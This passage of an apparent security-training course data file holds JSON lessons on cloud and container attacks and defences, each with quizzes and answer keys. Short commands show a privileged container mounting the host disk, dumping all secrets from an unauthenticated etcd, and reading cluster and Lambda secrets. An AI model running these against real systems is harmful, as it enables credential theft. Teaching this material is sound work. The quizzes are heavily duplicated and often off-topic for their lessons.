always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"container-escape","cat":"Cloud & Container","title":"Container Escape","diff":3,"xp":300,"intro":"Break out to the host.","sections":[{"type":"text","content":"Privileged containers, mounted socket, kernel exploits, capability abuse."},{"type":"code","lang":"bash","content":"cat /proc/1/cgroup | grep docker\nmount /dev/sda1 /tmp/hostmount  # if privileged"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Privileged container danger?","opts":["More CPU","Almost no isolation from host","No network","Dedicated VM"],"ans":1},{"type":"quiz","q":"OSINT stands for...","opts":["Open Source Intelligence","Operating System Integration","Online Security Interface","Offensive Strike Network"],"ans":0},{"type":"quiz","q":"What does a WHOIS query reveal?","opts":["Server vulnerabilities","Domain registration details","Passwords","Network traffic"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"k8s-intro","cat":"Cloud & Container","title":"Kubernetes Security Intro","diff":2,"xp":150,"intro":"Misconfigurations at scale.","sections":[{"type":"text","content":"RBAC, exposed API, privileged pods, secrets management, network policies."},{"type":"code","lang":"bash","content":"kubectl auth can-i --list\nkubectl get secrets -A"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Default K8s network policy?","opts":["All blocked","All pods can talk to all pods","Same-namespace only","HTTPS only"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"k8s-rbac","cat":"Cloud & Container","title":"Kubernetes RBAC","diff":2,"xp":150,"intro":"Who can create pods, read secrets, delete namespaces.","sections":[{"type":"text","content":"Roles, ClusterRoles, bindings. cluster-admin to service accounts = escalation."},{"type":"code","lang":"bash","content":"kubectl auth can-i create pods\nkubectl get clusterrolebindings -o json | jq '.items[] | {name: .metadata.name, role: .roleRef.name}'"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Most powerful K8s ClusterRole?","opts":["admin","cluster-admin","edit","view"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"k8s-secrets","cat":"Cloud & Container","title":"Kubernetes Secrets","diff":1,"xp":75,"intro":"Base64-encoded, NOT encrypted.","sections":[{"type":"text","content":"Anyone with 'get secrets' can decode instantly. Use external secret managers."},{"type":"code","lang":"bash","content":"kubectl get secret db-creds -o yaml\necho 'cGFzc3dvcmQxMjM=' | base64 -d  # password123"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"K8s Secrets stored as?","opts":["AES-256","Base64 (NOT encrypted)","SHA-256","Plaintext"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"Infrastructure drift means...","opts":["Moving to a new region","Actual infrastructure diverged from its defined state","Network latency","Container migration"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"k8s-network-policies","cat":"Cloud & Container","title":"K8s Network Policies","diff":2,"xp":150,"intro":"Default: every pod can talk to every pod. Fix it.","sections":[{"type":"text","content":"NetworkPolicies restrict pod-to-pod communication using label selectors."},{"type":"code","lang":"yaml","content":"apiVersion: networking.k8s.io/v1\nkind: NetworkPolicy\nmetadata:\n  name: deny-all\nspec:\n  podSelector: {}\n  policyTypes: [Ingress]"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Without NetworkPolicy?","opts":["All blocked","All pods communicate freely","DNS only","Same-node only"],"ans":1},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"etcd-exploitation","cat":"Cloud & Container","title":"etcd Exploitation","diff":3,"xp":250,"intro":"etcd stores all K8s state including secrets.","sections":[{"type":"text","content":"If etcd (port 2379) is unauthenticated, read every secret and modify any resource."},{"type":"code","lang":"bash","content":"etcdctl --endpoints=http://<ip>:2379 get /registry/secrets --prefix"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"etcd default port?","opts":["6443","2379","8080","10250"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"serverless-security","cat":"Cloud & Container","title":"Serverless Security","diff":2,"xp":150,"intro":"No servers to patch, still vulnerabilities to exploit.","sections":[{"type":"text","content":"Overprivileged roles, secrets in env vars, event injection, dependency confusion."},{"type":"code","lang":"bash","content":"aws lambda get-function-configuration --function-name target | jq '.Environment.Variables'"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Secrets insecurely stored in serverless?","opts":["CloudWatch","Environment variables","S3","API Gateway"],"ans":1},{"type":"quiz","q":"Which encoding prevents XSS in HTML output?","opts":["Base64","URL encoding","HTML entity encoding","Hex encoding"],"ans":2},{"type":"quiz","q":"Which HTTP method is used to submit form data?","opts":["GET","POST","PUT","TRACE"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"terraform-security","cat":"Cloud & Container","title":"Terraform Security","diff":2,"xp":150,"intro":"IaC makes misconfigs repeatable.","sections":[{"type":"text","content":"Scan with tfsec/checkov. Never commit state files or .tfvars with passwords."},{"type":"code","lang":"bash","content":"tfsec .\ncheckov -d ."},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Terraform file with secrets?","opts":["main.tf","terraform.tfstate","variables.tf","outputs.tf"],"ans":1},{"type":"quiz","q":"What header prevents clickjacking?","opts":["X-XSS-Protection","Content-Type","X-Frame-Options","Cache-Control"],"ans":2},{"type":"quiz","q":"Input validation should happen on...","opts":["Client side only","Server side only","Both client and server side","Neither"],"ans":2},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"cloudtrail-analysis","cat":"Cloud & Container","title":"AWS CloudTrail 